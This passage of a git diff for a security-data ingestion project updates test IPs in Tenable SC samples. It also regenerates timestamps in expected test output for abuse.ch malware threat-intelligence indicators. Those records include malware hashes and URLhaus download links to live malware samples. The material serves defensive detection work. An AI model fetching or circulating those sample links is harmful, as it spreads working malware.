Scan\",\"repository\":{\"dataFormat\":\"IPv4\",\"description\":\"\",\"id\":\"2\",\"name\":\"Staged-Large\",\"sciID\":\"1\"},\"score\":\"307\",\"severityCritical\":\"6\",\"severityHigh\":\"4\",\"severityInfo\":\"131\",\"severityLow\":\"0\",\"severityMedium\":\"9\",\"total\":\"150\",\"tpmID\":\"\",\"uniqueness\":\"repositoryID,ip,dnsName\",\"uuid\":\"4add65d0-27fc-491c-91ba-3f498a61f49e\"}", "type": "info" }, "host": { "domain": "example", "hostname": "rnkmigauv2l8zeyf.example", "ip": [ - "0.0.228.153" + "89.160.20.156" ], "mac": [ "00-00-00-47-05-0D" @@ -52,7 +52,7 @@ "UNKNOWN\\RNKMIGAUV2L8ZEYF.EXAMPLE" ], "ip": [ - "0.0.228.153" + "89.160.20.156" ] }, "tags": [ @@ -69,7 +69,7 @@ "name": "rnkmigauv2l8zeyf.example" }, "host_uniqueness": "repositoryID,ip,dnsName", - "ip": "0.0.228.153", + "ip": "89.160.20.156", "mac": "00-00-00-47-05-0D", "netbios": { "name": "UNKNOWN\\RNKMIGAUV2L8ZEYF.EXAMPLE" diff --git a/packages/tenable_sc/docs/README.md b/packages/tenable_sc/docs/README.md index a4b9af55558..724254dacfe 100644 --- a/packages/tenable_sc/docs/README.md +++ b/packages/tenable_sc/docs/README.md @@ -59,14 +59,14 @@ An example event for `asset` looks as following: "dataset": "tenable_sc.asset", "ingested": "2021-12-09T09:09:52Z", "kind": "state", - "original": "{\"biosGUID\":\"9e8c4d43-982b-4405-a76c-d56c1d6cf117\",\"dnsName\":\"rnkmigauv2l8zeyf.example\",\"hostUniqueness\":\"repositoryID,ip,dnsName\",\"ip\":\"0.0.228.153\",\"lastAuthRun\":\"\",\"lastUnauthRun\":\"\",\"macAddress\":\"00:00:00:47:05:0d\",\"mcafeeGUID\":\"\",\"netbiosName\":\"UNKNOWN\\\\RNKMIGAUV2L8ZEYF.EXAMPLE\",\"osCPE\":\"cpe:/o:microsoft:windows_10:::x64-home\",\"pluginSet\":\"201901281542\",\"policyName\":\"Basic Agent Scan\",\"repository\":{\"dataFormat\":\"IPv4\",\"description\":\"\",\"id\":\"2\",\"name\":\"Staged-Large\",\"sciID\":\"1\"},\"score\":\"307\",\"severityCritical\":\"6\",\"severityHigh\":\"4\",\"severityInfo\":\"131\",\"severityLow\":\"0\",\"severityMedium\":\"9\",\"total\":\"150\",\"tpmID\":\"\",\"uniqueness\":\"repositoryID,ip,dnsName\",\"uuid\":\"4add65d0-27fc-491c-91ba-3f498a61f49e\"}", + "original": "{\"biosGUID\":\"9e8c4d43-982b-4405-a76c-d56c1d6cf117\",\"dnsName\":\"rnkmigauv2l8zeyf.example\",\"hostUniqueness\":\"repositoryID,ip,dnsName\",\"ip\":\"89.160.20.156\",\"lastAuthRun\":\"\",\"lastUnauthRun\":\"\",\"macAddress\":\"00:00:00:47:05:0d\",\"mcafeeGUID\":\"\",\"netbiosName\":\"UNKNOWN\\\\RNKMIGAUV2L8ZEYF.EXAMPLE\",\"osCPE\":\"cpe:/o:microsoft:windows_10:::x64-home\",\"pluginSet\":\"201901281542\",\"policyName\":\"Basic Agent Scan\",\"repository\":{\"dataFormat\":\"IPv4\",\"description\":\"\",\"id\":\"2\",\"name\":\"Staged-Large\",\"sciID\":\"1\"},\"score\":\"307\",\"severityCritical\":\"6\",\"severityHigh\":\"4\",\"severityInfo\":\"131\",\"severityLow\":\"0\",\"severityMedium\":\"9\",\"total\":\"150\",\"tpmID\":\"\",\"uniqueness\":\"repositoryID,ip,dnsName\",\"uuid\":\"4add65d0-27fc-491c-91ba-3f498a61f49e\"}", "type": "info" }, "host": { "domain": "example", "hostname": "rnkmigauv2l8zeyf.example", "ip": [ - "0.0.228.153" + "89.160.20.156" ], "mac": [ "00-00-00-47-05-0D" @@ -83,7 +83,7 @@ An example event for `asset` looks as following: "UNKNOWN\\RNKMIGAUV2L8ZEYF.EXAMPLE" ], "ip": [ - "0.0.228.153" + "89.160.20.156" ] }, "tags": [ @@ -100,7 +100,7 @@ An example event for `asset` looks as following: "name": "rnkmigauv2l8zeyf.example" }, "host_uniqueness": "repositoryID,ip,dnsName", - "ip": "0.0.228.153", + "ip": "89.160.20.156", "mac": "00-00-00-47-05-0D", "netbios": { "name": "UNKNOWN\\RNKMIGAUV2L8ZEYF.EXAMPLE" diff --git a/packages/ti_abusech/changelog.yml b/packages/ti_abusech/changelog.yml index be88686cfcb..677dd7a9220 100644 --- a/packages/ti_abusech/changelog.yml +++ b/packages/ti_abusech/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.1.4" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "1.1.3" changes: - description: Change test public IPs to the supported subset diff --git a/packages/ti_abusech/data_stream/malware/_dev/test/pipeline/test-malware-ndjson.log-expected.json b/packages/ti_abusech/data_stream/malware/_dev/test/pipeline/test-malware-ndjson.log-expected.json index c389ac03ae4..7989d7039ed 100644 --- a/packages/ti_abusech/data_stream/malware/_dev/test/pipeline/test-malware-ndjson.log-expected.json +++ b/packages/ti_abusech/data_stream/malware/_dev/test/pipeline/test-malware-ndjson.log-expected.json @@ -36,7 +36,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:03.807747500Z", + "ingested": "2021-12-14T14:56:11.724485962Z", "original": "{\"md5_hash\":\"7871286a8f1f68a14b18ae475683f724\",\"sha256_hash\":\"48a6aee18bcfe9058b35b1018832aef1c9efd8f50ac822f49abb484a5e2a4b1f\",\"file_type\":\"dll\",\"file_size\":\"277504\",\"signature\":null,\"firstseen\":\"2021-01-14 06:14:05\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/48a6aee18bcfe9058b35b1018832aef1c9efd8f50ac822f49abb484a5e2a4b1f/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JG5:X5DpBw/KViMTB1MnEWk0115JW\",\"tlsh\":\"1344D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717\"}", "category": "threat", "type": "indicator", @@ -82,7 +82,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:03.807764300Z", + "ingested": "2021-12-14T14:56:11.724488224Z", "original": "{\"md5_hash\":\"7b4c77dc293347b467fb860e34515163\",\"sha256_hash\":\"ec59538e8de8525b1674b3b8fe0c180ac822145350bcce054ad3fc6b95b1b5a4\",\"file_type\":\"dll\",\"file_size\":\"277504\",\"signature\":null,\"firstseen\":\"2021-01-14 06:11:41\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/ec59538e8de8525b1674b3b8fe0c180ac822145350bcce054ad3fc6b95b1b5a4/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGY:X5DpBw/KViMTB1MnEWk0115Jr\",\"tlsh\":\"4E44D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717\"}", "category": "threat", "type": "indicator", @@ -134,7 +134,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:03.807776600Z", + "ingested": "2021-12-14T14:56:11.724488673Z", "original": "{\"md5_hash\":\"373d34874d7bc89fd4cefa6272ee80bf\",\"sha256_hash\":\"b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7\",\"file_type\":\"dll\",\"file_size\":\"277504\",\"signature\":null,\"firstseen\":\"2021-01-14 06:11:22\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7/\",\"virustotal\":{\"result\":\"25 / 66\",\"percent\":\"37.88\",\"link\":\"https://www.virustotal.com/gui/file/b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7/detection/f-b0e914d\"},\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGG:X5DpBw/KViMTB1MnEWk0115Jd\",\"tlsh\":\"7544D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717\"}", "category": "threat", "type": "indicator", @@ -180,7 +180,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:03.807787900Z", + "ingested": "2021-12-14T14:56:11.724489057Z", "original": "{\"md5_hash\":\"e2e02aae857488dbdbe6631c29abf3f8\",\"sha256_hash\":\"7483e834a73fb6817769596fe4c0fa01d28639f52bbbdc2b8a56c36d466dd7f8\",\"file_type\":\"dll\",\"file_size\":\"284672\",\"signature\":null,\"firstseen\":\"2021-01-14 06:11:21\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/7483e834a73fb6817769596fe4c0fa01d28639f52bbbdc2b8a56c36d466dd7f8/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:0hlBeZgR9LqvgFcwNAwhGV52n5Dv4JdEqvQykqRqYdBx8pRA7OZJ9:0h3eZgRQCcw+MN54dEq7kqRtoLZH\",\"tlsh\":\"5554CF22E642C926F1E900FCB2A98B4451257E355F40F4D777C40FABA835AE2AF27717\"}", "category": "threat", "type": "indicator", @@ -223,7 +223,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:03.807799200Z", + "ingested": "2021-12-14T14:56:11.724489464Z", "original": "{\"md5_hash\":\"3e988e32b0c3c230d534e286665b89a5\",\"sha256_hash\":\"760e729426fb115b967a41e5a6f2f42d7a52a5cee74ed99065a6dc39bf89f59b\",\"file_type\":\"unknown\",\"file_size\":\"352\",\"signature\":null,\"firstseen\":\"2021-01-14 06:08:02\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/760e729426fb115b967a41e5a6f2f42d7a52a5cee74ed99065a6dc39bf89f59b/\",\"virustotal\":null,\"imphash\":null,\"ssdeep\":\"6:TE6ll8uXi0jIAv6BHvPuA7RKTmOQamsQMGvMQgTYbtsWsQ72hCqPZG/:TTll8uTo5uA7RKtQamsS0QJfsQ7mCR\",\"tlsh\":\"3CE0C002AB26C036500D154C221655B3B871911503CA14E6A6824BEA765D4A3290D190\"}", "category": "threat", "type": "indicator", @@ -275,7 +275,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:03.807810400Z", + "ingested": "2021-12-14T14:56:11.724489873Z", "original": "{\"md5_hash\":\"dcc20d534cdf29eab03d8148bf728857\",\"sha256_hash\":\"86655c0bcf9b21b5efc682f58eb80f42811042ba152358e1bfbbb867315a60ac\",\"file_type\":\"dll\",\"file_size\":\"277504\",\"signature\":null,\"firstseen\":\"2021-01-14 06:08:02\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/86655c0bcf9b21b5efc682f58eb80f42811042ba152358e1bfbbb867315a60ac/\",\"virustotal\":{\"result\":\"27 / 69\",\"percent\":\"39.13\",\"link\":\"https://www.virustotal.com/gui/file/86655c0bcf9b21b5efc682f58eb80f42811042ba152358e1bfbbb867315a60ac/detection/f-86655c0\"},\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGI:X5DpBw/KViMTB1MnEWk0115JH\",\"tlsh\":\"0D44D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717\"}", "category": "threat", "type": "indicator", @@ -321,7 +321,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:03.807886200Z", + "ingested": "2021-12-14T14:56:11.724490274Z", "original": "{\"md5_hash\":\"f6facbf7a90b9e67a6de9f6634eb40ba\",\"sha256_hash\":\"e91c9e11d3ce4f55fabd7196279367482d2fabfa32df81e614b15fc53b4e26be\",\"file_type\":\"dll\",\"file_size\":\"284672\",\"signature\":null,\"firstseen\":\"2021-01-14 06:07:53\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/e91c9e11d3ce4f55fabd7196279367482d2fabfa32df81e614b15fc53b4e26be/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:0hlBeZgR9LqvgFcwNAwhGV52n5Dv4JdEqvQykqRqYdBx8pRA7OZJ1:0h3eZgRQCcw+MN54dEq7kqRtoLZL\",\"tlsh\":\"2554CF22E642C926F1E900FCB2A98B4451257E355F40F4D777C40FABA835AE2AF27717\"}", "category": "threat", "type": "indicator", @@ -367,7 +367,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:03.807898100Z", + "ingested": "2021-12-14T14:56:11.724490660Z", "original": "{\"md5_hash\":\"44325fd5bdda2e2cdea07c3a39953bb1\",\"sha256_hash\":\"beedbbcacfc34b5edd8c68e3e4acf364992ebbcd989548e09e38fa03c5659bac\",\"file_type\":\"dll\",\"file_size\":\"277504\",\"signature\":null,\"firstseen\":\"2021-01-14 06:07:41\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/beedbbcacfc34b5edd8c68e3e4acf364992ebbcd989548e09e38fa03c5659bac/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JG/:X5DpBw/KViMTB1MnEWk0115Jg\",\"tlsh\":\"A044D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717\"}", "category": "threat", "type": "indicator", @@ -415,7 +415,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:03.807909300Z", + "ingested": "2021-12-14T14:56:11.724491052Z", "original": "{\"md5_hash\":\"4c549051950522a3f1b0814aa9b1f6d1\",\"sha256_hash\":\"7cba55da723c0e020267a02e6ffc83e03a83701757fc4ec65ea398618ad881cf\",\"file_type\":\"dll\",\"file_size\":\"277504\",\"signature\":\"Heodo\",\"firstseen\":\"2021-01-14 06:07:31\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/7cba55da723c0e020267a02e6ffc83e03a83701757fc4ec65ea398618ad881cf/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JG4:X5DpBw/KViMTB1MnEWk0115Jv\",\"tlsh\":\"4544D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717\"}", "category": "threat", "type": "indicator", @@ -461,7 +461,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:03.807920500Z", + "ingested": "2021-12-14T14:56:11.724491438Z", "original": "{\"md5_hash\":\"d7333113098d88b6a5dd5b8eb24f9b87\",\"sha256_hash\":\"426be5e085e6bbad8430223dc89d8d3ced497133f8d478fd00005bcbb73399d4\",\"file_type\":\"dll\",\"file_size\":\"284672\",\"signature\":null,\"firstseen\":\"2021-01-14 06:07:07\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/426be5e085e6bbad8430223dc89d8d3ced497133f8d478fd00005bcbb73399d4/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:0hlBeZgR9LqvgFcwNAwhGV52n5Dv4JdEqvQykqRqYdBx8pRA7OZJw:0h3eZgRQCcw+MN54dEq7kqRtoLZW\",\"tlsh\":\"9454CF22E642C926F1E900FCB2A98B4451257E355F40F4D777C40FABA835AE2AF27717\"}", "category": "threat", "type": "indicator", @@ -507,7 +507,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:03.807931800Z", + "ingested": "2021-12-14T14:56:11.724491832Z", "original": "{\"md5_hash\":\"c8dbb261c1f450534c3693da2f4b479f\",\"sha256_hash\":\"25093afdaeb3ea000743ab843360a6b64f58c0a1ab950072ba6528056735deb9\",\"file_type\":\"dll\",\"file_size\":\"277504\",\"signature\":null,\"firstseen\":\"2021-01-14 06:07:07\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/25093afdaeb3ea000743ab843360a6b64f58c0a1ab950072ba6528056735deb9/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGe:X5DpBw/KViMTB1MnEWk0115JR\",\"tlsh\":\"F344D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717\"}", "category": "threat", "type": "indicator", @@ -553,7 +553,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:03.807943800Z", + "ingested": "2021-12-14T14:56:11.724492355Z", "original": "{\"md5_hash\":\"714953f1d0031a4bb2f0c44afd015931\",\"sha256_hash\":\"b3327a96280365e441057f490df6261c9a2400fd63719eb9a7a0c9db95beecc5\",\"file_type\":\"dll\",\"file_size\":\"277504\",\"signature\":null,\"firstseen\":\"2021-01-14 06:07:06\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/b3327a96280365e441057f490df6261c9a2400fd63719eb9a7a0c9db95beecc5/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGc:X5DpBw/KViMTB1MnEWk0115J7\",\"tlsh\":\"F644D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717\"}", "category": "threat", "type": "indicator", @@ -599,7 +599,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:03.807955400Z", + "ingested": "2021-12-14T14:56:11.724492754Z", "original": "{\"md5_hash\":\"20fd22742500d4cec123398afc3d3672\",\"sha256_hash\":\"e92b54904391c171238863b584355197ba4508f73320a8e89afbb5425fc2dc4b\",\"file_type\":\"dll\",\"file_size\":\"277504\",\"signature\":null,\"firstseen\":\"2021-01-14 06:07:00\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/e92b54904391c171238863b584355197ba4508f73320a8e89afbb5425fc2dc4b/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGc:X5DpBw/KViMTB1MnEWk0115JP\",\"tlsh\":\"BE44D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717\"}", "category": "threat", "type": "indicator", @@ -645,7 +645,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:03.808039Z", + "ingested": "2021-12-14T14:56:11.724493127Z", "original": "{\"md5_hash\":\"aa81ceea053797a6f8c38a0f2f9b80b0\",\"sha256_hash\":\"dd15e74b3cd3a4fdb5f47adefd6f90e27d5a20e01316cc791711f6dce7c0f52e\",\"file_type\":\"dll\",\"file_size\":\"277504\",\"signature\":null,\"firstseen\":\"2021-01-14 06:06:36\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/dd15e74b3cd3a4fdb5f47adefd6f90e27d5a20e01316cc791711f6dce7c0f52e/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGf:X5DpBw/KViMTB1MnEWk0115Jo\",\"tlsh\":\"CC44D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717\"}", "category": "threat", "type": "indicator", @@ -693,7 +693,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:03.808106100Z", + "ingested": "2021-12-14T14:56:11.724493511Z", "original": "{\"md5_hash\":\"a2ce6795664c0fa93b07fa54ba868991\",\"sha256_hash\":\"0fae1eeabc4f5e07bd16f7851aec5ab6032d407c7ff0270f2b6e85c2a3efebd1\",\"file_type\":\"dll\",\"file_size\":\"277504\",\"signature\":\"Heodo\",\"firstseen\":\"2021-01-14 06:06:13\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/0fae1eeabc4f5e07bd16f7851aec5ab6032d407c7ff0270f2b6e85c2a3efebd1/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGD:X5DpBw/KViMTB1MnEWk0115JY\",\"tlsh\":\"8C44D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717\"}", "category": "threat", "type": "indicator", @@ -739,7 +739,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:03.808119Z", + "ingested": "2021-12-14T14:56:11.724493897Z", "original": "{\"md5_hash\":\"9b9bac158dacb9c2f5511e9c464a7de4\",\"sha256_hash\":\"07a9d84c0b2c8cf1fd90ab409b9399d06920ab4b6efb647b5a3b9bef1045ee7e\",\"file_type\":\"dll\",\"file_size\":\"280064\",\"signature\":null,\"firstseen\":\"2021-01-14 06:05:52\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/07a9d84c0b2c8cf1fd90ab409b9399d06920ab4b6efb647b5a3b9bef1045ee7e/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:WlLMUG2gFWLDFO9vNa11y3NPcJufFFTXNZrjJTKk:W5MT4WNaHy9P1FjbrjlKk\",\"tlsh\":\"6B54CF217A53C826F5E800FCA6E9878914167F346F44A4C773D40F6AA8759E2EF2B317\"}", "category": "threat", "type": "indicator", @@ -785,7 +785,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:03.808131Z", + "ingested": "2021-12-14T14:56:11.724494411Z", "original": "{\"md5_hash\":\"e48e3fa5e0f7b21c1ecf1efc81ff91e8\",\"sha256_hash\":\"708c0193aec6354af6877f314d4b0e3864552bac77258bee9ee5bf886a116df5\",\"file_type\":\"dll\",\"file_size\":\"277504\",\"signature\":null,\"firstseen\":\"2021-01-14 06:05:51\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/708c0193aec6354af6877f314d4b0e3864552bac77258bee9ee5bf886a116df5/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGo:X5DpBw/KViMTB1MnEWk0115Jj\",\"tlsh\":\"6644D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717\"}", "category": "threat", "type": "indicator", @@ -833,7 +833,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:03.808142500Z", + "ingested": "2021-12-14T14:56:11.724494802Z", "original": "{\"md5_hash\":\"8957f5347633ab4b10c2ae4fb92c8572\",\"sha256_hash\":\"f70a3c016fe791eb30959961f0bcaa08ba7b738491b9ae61cb4a667cd1de8b37\",\"file_type\":\"dll\",\"file_size\":\"284672\",\"signature\":\"Heodo\",\"firstseen\":\"2021-01-14 06:05:50\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/f70a3c016fe791eb30959961f0bcaa08ba7b738491b9ae61cb4a667cd1de8b37/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:0hlBeZgR9LqvgFcwNAwhGV52n5Dv4JdEqvQykqRqYdBx8pRA7OZJy:0h3eZgRQCcw+MN54dEq7kqRtoLZM\",\"tlsh\":\"0754CF22E642C926F1E900FCB2A98B4451257E355F40F4D777C40FABA835AE2AF27717\"}", "category": "threat", "type": "indicator", @@ -879,7 +879,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:03.808153800Z", + "ingested": "2021-12-14T14:56:11.724495202Z", "original": "{\"md5_hash\":\"09cc76b7077b4d5704e46e864575ff03\",\"sha256_hash\":\"94ca186561b13fa9b1bf15f7e66118debc686b40d2a62a5cf4b3c6ca6ee1c7a1\",\"file_type\":\"dll\",\"file_size\":\"277504\",\"signature\":null,\"firstseen\":\"2021-01-14 06:05:36\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/94ca186561b13fa9b1bf15f7e66118debc686b40d2a62a5cf4b3c6ca6ee1c7a1/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JG/:X5DpBw/KViMTB1MnEWk0115Js\",\"tlsh\":\"BB44D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717\"}", "category": "threat", "type": "indicator", @@ -925,7 +925,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:03.808172600Z", + "ingested": "2021-12-14T14:56:11.724495607Z", "original": "{\"md5_hash\":\"98a1cdf7de4232363f1d1e0f33dbfd99\",\"sha256_hash\":\"909f890dbc5748845cf06d0fb0b73a5c0cb17761f37e9cd4810eea0d0eb8627f\",\"file_type\":\"dll\",\"file_size\":\"284672\",\"signature\":null,\"firstseen\":\"2021-01-14 06:05:16\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/909f890dbc5748845cf06d0fb0b73a5c0cb17761f37e9cd4810eea0d0eb8627f/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:0hlBeZgR9LqvgFcwNAwhGV52n5Dv4JdEqvQykqRqYdBx8pRA7OZJQ:0h3eZgRQCcw+MN54dEq7kqRtoLZ+\",\"tlsh\":\"C554CF22E642C926F1E900FCB2A98B4451257E355F40F4D777C40FABA835AE2AF27717\"}", "category": "threat", "type": "indicator", @@ -973,7 +973,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:03.808282800Z", + "ingested": "2021-12-14T14:56:11.724495990Z", "original": "{\"md5_hash\":\"8a51830c1662513ba6bd44e2f7849547\",\"sha256_hash\":\"d1fa76346bef5bc8adaa615e109894a7c30f0bef07ab6272409c4056ea8d52aa\",\"file_type\":\"dll\",\"file_size\":\"284672\",\"signature\":\"Heodo\",\"firstseen\":\"2021-01-14 06:05:15\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/d1fa76346bef5bc8adaa615e109894a7c30f0bef07ab6272409c4056ea8d52aa/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:0hlBeZgR9LqvgFcwNAwhGV52n5Dv4JdEqvQykqRqYdBx8pRA7OZJh:0h3eZgRQCcw+MN54dEq7kqRtoLZ/\",\"tlsh\":\"1654CF22E642C926F1E900FCB2A98B4451257E355F40F4D777C40FABA835AE2AF27717\"}", "category": "threat", "type": "indicator", @@ -1019,7 +1019,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:03.808295800Z", + "ingested": "2021-12-14T14:56:11.724496371Z", "original": "{\"md5_hash\":\"ae21d742a8118d6b86674aa5370bd6a7\",\"sha256_hash\":\"3b9698b6c18bcba15ee33378440dd3f42509730e6b1d2d5832c71a74b1920e51\",\"file_type\":\"dll\",\"file_size\":\"280064\",\"signature\":null,\"firstseen\":\"2021-01-14 06:05:12\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/3b9698b6c18bcba15ee33378440dd3f42509730e6b1d2d5832c71a74b1920e51/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:WlLMUG2gFWLDFO9vNa11y3NPcJufFFTXNZrjJTKS:W5MT4WNaHy9P1FjbrjlKS\",\"tlsh\":\"5454CF217A53C826F5E800FCA6E9878925167F346F44A4C373D40F6AA8759E2DF2B317\"}", "category": "threat", "type": "indicator", @@ -1065,7 +1065,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:03.808313200Z", + "ingested": "2021-12-14T14:56:11.724496765Z", "original": "{\"md5_hash\":\"78c9d88d24ed1d982a83216eed1590f6\",\"sha256_hash\":\"d11edc90f0e879a175abc6e2ce5c94a263aa2a01cd3b6e8b9fdf93a51235ae99\",\"file_type\":\"dll\",\"file_size\":\"277504\",\"signature\":null,\"firstseen\":\"2021-01-14 06:04:38\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/d11edc90f0e879a175abc6e2ce5c94a263aa2a01cd3b6e8b9fdf93a51235ae99/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JG8:X5DpBw/KViMTB1MnEWk0115Jr\",\"tlsh\":\"6044D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717\"}", "category": "threat", "type": "indicator", @@ -1111,7 +1111,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:03.808326100Z", + "ingested": "2021-12-14T14:56:11.724497259Z", "original": "{\"md5_hash\":\"236577d5d83e2a8d08623a7a7f724188\",\"sha256_hash\":\"8cd28fed7ebdcd79ea2509dca84f0a727ca28d4eaaed5a92cd10b1279ff16afa\",\"file_type\":\"dll\",\"file_size\":\"241664\",\"signature\":null,\"firstseen\":\"2021-01-14 